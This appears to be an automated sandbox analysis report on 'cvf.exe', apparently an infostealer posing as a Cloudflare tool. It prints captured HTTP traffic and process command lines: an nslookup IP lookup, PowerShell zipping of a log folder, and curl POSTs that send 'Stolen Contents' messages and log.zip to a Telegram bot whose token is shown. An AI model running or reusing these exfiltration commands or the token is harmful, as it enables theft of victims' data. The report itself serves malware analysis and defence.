                                                            Data Ascii: {"chat_id": "-4798834305", "parse_mode": "HTML", "text": " Stolen Contents \n\n IP: Address: 208.67.222.222\nAddress: 54.38.153.202\n\n Wallet Extensions (0)\n\n Software Wallets (0)\n\n Cookies & Saved Passwords (0)\n N
                                                            2025-03-12 19:15:02 UTC388INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:15:02 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 823
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:15:02 UTC823INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 30 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 39 34 36 34 36 36 33 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 46 61 6b 65 20 43 6c 6f 75 64 66 6c 61 72 65 20 42 6f 74 20 5c 75 64 38 33 65 5c 75 64 65 39 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 46 61 6b 65 43 6c 6f 75 64 66 6c 61 72 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 37 39 38 38 33 34 33 30 35 2c 22 74 69 74 6c 65 22 3a 22 63 6c 6f 75 64 66 6c 61 72 65 20 6c 6f 67 73 20 61 6c 6c 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61
                                                            Data Ascii: {"ok":true,"result":{"message_id":15093,"from":{"id":8194646631,"is_bot":true,"first_name":"Fake Cloudflare Bot \ud83e\ude9d","username":"FakeCloudflareBot"},"chat":{"id":-4798834305,"title":"cloudflare logs all","type":"group","all_members_are_administra


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449731149.154.167.2204438176C:\Windows\SysWOW64\curl.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-12 19:15:04 UTC195OUTPOST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 399
                                                            2025-03-12 19:15:04 UTC399OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 20 22 2d 34 37 39 38 38 33 34 33 30 35 22 2c 20 22 70 61 72 73 65 5f 6d 6f 64 65 22 3a 20 22 48 54 4d 4c 22 2c 20 22 74 65 78 74 22 3a 20 22 f0 9f 92 80 20 53 74 6f 6c 65 6e 20 43 6f 6e 74 65 6e 74 73 20 f0 9f 92 80 5c 6e 5c 6e f0 9f 93 8d 20 49 50 3a 20 41 64 64 72 65 73 73 3a 20 20 32 30 38 2e 36 37 2e 32 32 32 2e 32 32 32 5c 6e 41 64 64 72 65 73 73 3a 20 20 35 34 2e 33 38 2e 31 35 33 2e 32 30 32 5c 6e 5c 6e f0 9f 93 82 20 57 61 6c 6c 65 74 20 45 78 74 65 6e 73 69 6f 6e 73 20 28 30 29 5c 6e 5c 6e f0 9f 93 82 20 53 6f 66 74 77 61 72 65 20 57 61 6c 6c 65 74 73 20 28 30 29 5c 6e 5c 6e f0 9f 94 90 20 43 6f 6f 6b 69 65 73 20 26 20 53 61 76 65 64 20 50 61 73 73 77 6f 72 64 73 20 28 30 29 5c 6e e2 94 94 e2 94 80 e2 94 80 20 4e
                                                            Data Ascii: {"chat_id": "-4798834305", "parse_mode": "HTML", "text": " Stolen Contents \n\n IP: Address: 208.67.222.222\nAddress: 54.38.153.202\n\n Wallet Extensions (0)\n\n Software Wallets (0)\n\n Cookies & Saved Passwords (0)\n N
                                                            2025-03-12 19:15:05 UTC388INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:15:05 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 823
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:15:05 UTC823INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 30 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 39 34 36 34 36 36 33 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 46 61 6b 65 20 43 6c 6f 75 64 66 6c 61 72 65 20 42 6f 74 20 5c 75 64 38 33 65 5c 75 64 65 39 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 46 61 6b 65 43 6c 6f 75 64 66 6c 61 72 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 37 39 38 38 33 34 33 30 35 2c 22 74 69 74 6c 65 22 3a 22 63 6c 6f 75 64 66 6c 61 72 65 20 6c 6f 67 73 20 61 6c 6c 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61
                                                            Data Ascii: {"ok":true,"result":{"message_id":15094,"from":{"id":8194646631,"is_bot":true,"first_name":"Fake Cloudflare Bot \ud83e\ude9d","username":"FakeCloudflareBot"},"chat":{"id":-4798834305,"title":"cloudflare logs all","type":"group","all_members_are_administra


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.449735149.154.167.2204431832C:\Windows\SysWOW64\curl.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-12 19:15:08 UTC195OUTPOST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 388
                                                            2025-03-12 19:15:08 UTC388OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 20 22 22 2c 20 22 70 61 72 73 65 5f 6d 6f 64 65 22 3a 20 22 48 54 4d 4c 22 2c 20 22 74 65 78 74 22 3a 20 22 f0 9f 92 80 20 53 74 6f 6c 65 6e 20 43 6f 6e 74 65 6e 74 73 20 f0 9f 92 80 5c 6e 5c 6e f0 9f 93 8d 20 49 50 3a 20 41 64 64 72 65 73 73 3a 20 20 32 30 38 2e 36 37 2e 32 32 32 2e 32 32 32 5c 6e 41 64 64 72 65 73 73 3a 20 20 35 34 2e 33 38 2e 31 35 33 2e 32 30 32 5c 6e 5c 6e f0 9f 93 82 20 57 61 6c 6c 65 74 20 45 78 74 65 6e 73 69 6f 6e 73 20 28 30 29 5c 6e 5c 6e f0 9f 93 82 20 53 6f 66 74 77 61 72 65 20 57 61 6c 6c 65 74 73 20 28 30 29 5c 6e 5c 6e f0 9f 94 90 20 43 6f 6f 6b 69 65 73 20 26 20 53 61 76 65 64 20 50 61 73 73 77 6f 72 64 73 20 28 30 29 5c 6e e2 94 94 e2 94 80 e2 94 80 20 4e 6f 6e 65 20 28 4e 2f 41 29 5c 6e
                                                            Data Ascii: {"chat_id": "", "parse_mode": "HTML", "text": " Stolen Contents \n\n IP: Address: 208.67.222.222\nAddress: 54.38.153.202\n\n Wallet Extensions (0)\n\n Software Wallets (0)\n\n Cookies & Saved Passwords (0)\n None (N/A)\n
                                                            2025-03-12 19:15:08 UTC346INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:15:08 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 75
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:15:08 UTC75INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 68 61 74 5f 69 64 20 69 73 20 65 6d 70 74 79 22 7d
                                                            Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: chat_id is empty"}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.449742149.154.167.2204436864C:\Windows\SysWOW64\curl.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-12 19:15:21 UTC250OUTPOST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Length: 594
                                                            Content-Type: multipart/form-data; boundary=------------------------f44e17bf4b95ceb9
                                                            2025-03-12 19:15:21 UTC594OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 66 34 34 65 31 37 62 66 34 62 39 35 63 65 62 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 34 37 39 38 38 33 34 33 30 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 66 34 34 65 31 37 62 66 34 62 39 35 63 65 62 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6c 6f 67 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72
                                                            Data Ascii: --------------------------f44e17bf4b95ceb9Content-Disposition: form-data; name="chat_id"-4798834305--------------------------f44e17bf4b95ceb9Content-Disposition: form-data; name="document"; filename="log.zip"Content-Type: application/octet-str
                                                            2025-03-12 19:15:22 UTC388INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:15:22 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 508
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:15:22 UTC508INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 35 30 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 39 34 36 34 36 36 33 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 46 61 6b 65 20 43 6c 6f 75 64 66 6c 61 72 65 20 42 6f 74 20 5c 75 64 38 33 65 5c 75 64 65 39 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 46 61 6b 65 43 6c 6f 75 64 66 6c 61 72 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 37 39 38 38 33 34 33 30 35 2c 22 74 69 74 6c 65 22 3a 22 63 6c 6f 75 64 66 6c 61 72 65 20 6c 6f 67 73 20 61 6c 6c 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61
                                                            Data Ascii: {"ok":true,"result":{"message_id":15095,"from":{"id":8194646631,"is_bot":true,"first_name":"Fake Cloudflare Bot \ud83e\ude9d","username":"FakeCloudflareBot"},"chat":{"id":-4798834305,"title":"cloudflare logs all","type":"group","all_members_are_administra


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.449745149.154.167.2204433876C:\Windows\SysWOW64\curl.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-12 19:15:24 UTC250OUTPOST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument HTTP/1.1
                                                            Host: api.telegram.org
                                                            User-Agent: curl/7.83.1
                                                            Accept: */*
                                                            Content-Length: 583
                                                            Content-Type: multipart/form-data; boundary=------------------------2079f6b0343d5674
                                                            2025-03-12 19:15:24 UTC583OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 37 39 66 36 62 30 33 34 33 64 35 36 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 37 39 66 36 62 30 33 34 33 64 35 36 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6c 6f 67 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04
                                                            Data Ascii: --------------------------2079f6b0343d5674Content-Disposition: form-data; name="chat_id"--------------------------2079f6b0343d5674Content-Disposition: form-data; name="document"; filename="log.zip"Content-Type: application/octet-streamPK
                                                            2025-03-12 19:15:25 UTC346INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 12 Mar 2025 19:15:25 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 75
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2025-03-12 19:15:25 UTC75INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 68 61 74 5f 69 64 20 69 73 20 65 6d 70 74 79 22 7d
                                                            Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: chat_id is empty"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Users\user\Desktop\cvf.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\cvf.exe"
                                                            Imagebase:0xbb0000
                                                            File size:299'520 bytes
                                                            MD5 hash:724D9557F66B00F2D74846E3E29434E6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff62fc20000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Users\user\Desktop\cvf.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cvf.exe
                                                            Imagebase:0xbb0000
                                                            File size:299'520 bytes
                                                            MD5 hash:724D9557F66B00F2D74846E3E29434E6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
                                                            Imagebase:0xc70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\nslookup.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                            Imagebase:0x3e0000
                                                            File size:77'824 bytes
                                                            MD5 hash:9D2EB13476B126CB61B12CDD03C7DCA6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr Address
                                                            Imagebase:0x170000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr /V resolver1.opendns.com
                                                            Imagebase:0x170000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
                                                            Imagebase:0xc70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:15:14:55
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\curl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
                                                            Imagebase:0x7f0000
                                                            File size:470'528 bytes
                                                            MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:15:14:58
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
                                                            Imagebase:0xc70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:15:14:58
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\curl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
                                                            Imagebase:0x7f0000
                                                            File size:470'528 bytes
                                                            MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:15:15:01
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
                                                            Imagebase:0xc70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:15:15:01
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\nslookup.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                            Imagebase:0x3e0000
                                                            File size:77'824 bytes
                                                            MD5 hash:9D2EB13476B126CB61B12CDD03C7DCA6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:15:15:01
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr Address
                                                            Imagebase:0x170000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:15:15:01
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr /V resolver1.opendns.com
                                                            Imagebase:0x170000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:15:15:01
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
                                                            Imagebase:0xc70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:15:15:02
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\curl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
                                                            Imagebase:0x7f0000
                                                            File size:470'528 bytes
                                                            MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:15:15:04
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
                                                            Imagebase:0xc70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:15:15:04
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\curl.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
                                                            Imagebase:0x7f0000
                                                            File size:470'528 bytes
                                                            MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:25
                                                            Start time:15:15:07
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
                                                            Imagebase:0xc70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:15:15:08
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
                                                            Imagebase:0x230000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:29
                                                            Start time:15:15:18
                                                            Start date:12/03/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
                                                            Imagebase:0xc70000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true